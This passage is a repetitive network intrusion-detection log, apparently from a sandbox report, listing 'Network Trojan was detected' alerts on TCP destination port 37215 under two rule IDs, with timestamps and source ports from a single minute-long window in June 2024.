              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.799847
              SID:2835222
              Source Port:35440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871007
              SID:2835222
              Source Port:33868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173835
              SID:2835222
              Source Port:40630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.301285
              SID:2835222
              Source Port:47262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.418094
              SID:2829579
              Source Port:51832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996743
              SID:2835222
              Source Port:54128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656490
              SID:2829579
              Source Port:47980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452569
              SID:2829579
              Source Port:42250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.270910
              SID:2835222
              Source Port:53442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805388
              SID:2835222
              Source Port:60484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039171
              SID:2829579
              Source Port:36706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097020
              SID:2835222
              Source Port:45060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.456736
              SID:2835222
              Source Port:52796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992967
              SID:2835222
              Source Port:47512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438497
              SID:2829579
              Source Port:39900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079476
              SID:2829579
              Source Port:38468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300304
              SID:2835222
              Source Port:37768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676063
              SID:2829579
              Source Port:47536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197023
              SID:2829579
              Source Port:59222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091365
              SID:2835222
              Source Port:55352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376763
              SID:2829579
              Source Port:39084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677612
              SID:2835222
              Source Port:36882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.042921
              SID:2835222
              Source Port:41776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670066
              SID:2829579
              Source Port:48160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135732
              SID:2835222
              Source Port:53442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503171
              SID:2835222
              Source Port:42334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.038066
              SID:2835222
              Source Port:58226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278981
              SID:2829579
              Source Port:57660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092025
              SID:2835222
              Source Port:59520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126109
              SID:2835222
              Source Port:38750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758278
              SID:2829579
              Source Port:59360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223433
              SID:2829579
              Source Port:34060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488219
              SID:2829579
              Source Port:55230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243806
              SID:2835222
              Source Port:49898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243768
              SID:2835222
              Source Port:53234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710834
              SID:2835222
              Source Port:51410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987800
              SID:2835222
              Source Port:57156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972681
              SID:2829579
              Source Port:42786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.844232
              SID:2829579
              Source Port:48754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509252
              SID:2835222
              Source Port:44574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731701
              SID:2835222
              Source Port:48596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214048
              SID:2829579
              Source Port:46470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438684
              SID:2835222
              Source Port:42234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266072
              SID:2835222
              Source Port:60366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344557
              SID:2829579
              Source Port:48642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457919
              SID:2835222
              Source Port:40672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885827
              SID:2835222
              Source Port:32810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781920
              SID:2835222
              Source Port:47128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213356
              SID:2835222
              Source Port:58522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230933
              SID:2835222
              Source Port:33190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417775
              SID:2835222
              Source Port:52816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485301
              SID:2829579
              Source Port:56000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995803
              SID:2829579
              Source Port:59984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308028
              SID:2829579
              Source Port:36280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573538
              SID:2829579
              Source Port:57132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153200
              SID:2835222
              Source Port:35822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321213
              SID:2835222
              Source Port:39310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133909
              SID:2829579
              Source Port:33092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835593
              SID:2829579
              Source Port:51590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357429
              SID:2829579
              Source Port:55426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369620
              SID:2829579
              Source Port:42282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973996
              SID:2835222
              Source Port:50076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785330
              SID:2829579
              Source Port:43254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405193
              SID:2835222
              Source Port:42950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418944
              SID:2829579
              Source Port:48810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609282
              SID:2835222
              Source Port:56736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098575
              SID:2829579
              Source Port:55152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711008
              SID:2835222
              Source Port:41988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.175555
              SID:2829579
              Source Port:60754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.277222
              SID:2829579
              Source Port:54424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423111
              SID:2829579
              Source Port:52888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.246155
              SID:2829579
              Source Port:41740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299050
              SID:2835222
              Source Port:57220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610428
              SID:2835222
              Source Port:58100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989071
              SID:2835222
              Source Port:43500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278892
              SID:2835222
              Source Port:36008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419740
              SID:2829579
              Source Port:46796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131054
              SID:2829579
              Source Port:47720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157940
              SID:2829579
              Source Port:36636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570363
              SID:2835222
              Source Port:34546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347368
              SID:2835222
              Source Port:52826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502341
              SID:2829579
              Source Port:51210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265073
              SID:2829579
              Source Port:36194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.783269
              SID:2835222
              Source Port:52866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057369
              SID:2835222
              Source Port:38186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436534
              SID:2829579
              Source Port:43314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632280
              SID:2829579
              Source Port:45686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211605
              SID:2829579
              Source Port:52700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502471
              SID:2835222
              Source Port:34816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130443
              SID:2829579
              Source Port:55354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408100
              SID:2835222
              Source Port:60130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.830832
              SID:2829579
              Source Port:58696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757465
              SID:2829579
              Source Port:47350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322708
              SID:2829579
              Source Port:41918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155654
              SID:2835222
              Source Port:47606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800192
              SID:2835222
              Source Port:35500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507197
              SID:2835222
              Source Port:36188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802391
              SID:2835222
              Source Port:51444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988653
              SID:2829579
              Source Port:36448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309028
              SID:2835222
              Source Port:40512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914588
              SID:2829579
              Source Port:39912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994539
              SID:2829579
              Source Port:42658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885921
              SID:2835222
              Source Port:44416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.928941
              SID:2829579
              Source Port:59344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417237
              SID:2835222
              Source Port:49314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914670
              SID:2835222
              Source Port:49930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214176
              SID:2835222
              Source Port:35380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040496
              SID:2829579
              Source Port:44652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177479
              SID:2829579
              Source Port:32828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175842
              SID:2829579
              Source Port:46084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.301155
              SID:2835222
              Source Port:54598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969681
              SID:2829579
              Source Port:43546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440466
              SID:2835222
              Source Port:55288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125028
              SID:2835222
              Source Port:50610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525949
              SID:2829579
              Source Port:43618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.727230
              SID:2835222
              Source Port:42260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.094109
              SID:2835222
              Source Port:57382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094926
              SID:2829579
              Source Port:32914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318019
              SID:2829579
              Source Port:56016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308114
              SID:2835222
              Source Port:59884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299400
              SID:2829579
              Source Port:44814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158825
              SID:2829579
              Source Port:59780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.830999
              SID:2829579
              Source Port:43290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.931714
              SID:2835222
              Source Port:33582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300164
              SID:2829579
              Source Port:45748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253144
              SID:2829579
              Source Port:49812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991821
              SID:2835222
              Source Port:51248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108238
              SID:2835222
              Source Port:45776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175535
              SID:2835222
              Source Port:49122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241561
              SID:2829579
              Source Port:35450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272899
              SID:2829579
              Source Port:32942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026608
              SID:2835222
              Source Port:59692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264258
              SID:2829579
              Source Port:53554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.305415
              SID:2835222
              Source Port:48658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.615718
              SID:2835222
              Source Port:54904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708758
              SID:2829579
              Source Port:42230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.010973
              SID:2835222
              Source Port:34462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231502
              SID:2835222
              Source Port:53730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279099
              SID:2835222
              Source Port:54624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306204
              SID:2829579
              Source Port:55038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.452970
              SID:2829579
              Source Port:32892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400798
              SID:2829579
              Source Port:33268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039261
              SID:2835222
              Source Port:55070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132450
              SID:2829579
              Source Port:60572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.452994
              SID:2829579
              Source Port:52856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842646
              SID:2835222
              Source Port:56418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.171336
              SID:2829579
              Source Port:39478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243586
              SID:2829579
              Source Port:44580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359338
              SID:2829579
              Source Port:43502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.789390
              SID:2829579
              Source Port:36646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159254
              SID:2829579
              Source Port:43198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439794
              SID:2829579
              Source Port:48922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075354
              SID:2835222
              Source Port:33698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757649
              SID:2829579
              Source Port:50576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.212945
              SID:2835222
              Source Port:56278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.750800
              SID:2829579
              Source Port:54468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480373
              SID:2835222
              Source Port:49696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.994076
              SID:2829579
              Source Port:50128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276662
              SID:2829579
              Source Port:34430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011176
              SID:2835222
              Source Port:48202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633218
              SID:2829579
              Source Port:59238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655786
              SID:2835222
              Source Port:49398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137685
              SID:2829579
              Source Port:42464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569599
              SID:2829579
              Source Port:46224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265320
              SID:2835222
              Source Port:42988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406629
              SID:2835222
              Source Port:58732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831615
              SID:2835222
              Source Port:42390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.673999
              SID:2835222
              Source Port:58344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989291
              SID:2835222
              Source Port:60384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547224
              SID:2829579
              Source Port:50230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610681
              SID:2835222
              Source Port:47220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074714
              SID:2835222
              Source Port:55270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154518
              SID:2835222
              Source Port:43976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503025
              SID:2835222
              Source Port:51822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307199
              SID:2835222
              Source Port:48358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012739
              SID:2829579
              Source Port:42882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508350
              SID:2829579
              Source Port:36552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509330
              SID:2829579
              Source Port:52658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.510279
              SID:2835222
              Source Port:37200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822214
              SID:2835222
              Source Port:35160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214402
              SID:2835222
              Source Port:52824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154332
              SID:2835222
              Source Port:40146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.523873
              SID:2835222
              Source Port:40854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991779
              SID:2835222
              Source Port:52936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913710
              SID:2829579
              Source Port:46690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228184
              SID:2835222
              Source Port:48622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674545
              SID:2829579
              Source Port:43908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782752
              SID:2835222
              Source Port:36498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278626
              SID:2829579
              Source Port:60282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092329
              SID:2835222
              Source Port:49978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276684
              SID:2829579
              Source Port:55618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478385
              SID:2835222
              Source Port:58222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509544
              SID:2829579
              Source Port:59906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475195
              SID:2835222
              Source Port:40608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670205
              SID:2829579
              Source Port:45898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942572
              SID:2829579
              Source Port:51744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028773
              SID:2829579
              Source Port:58782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
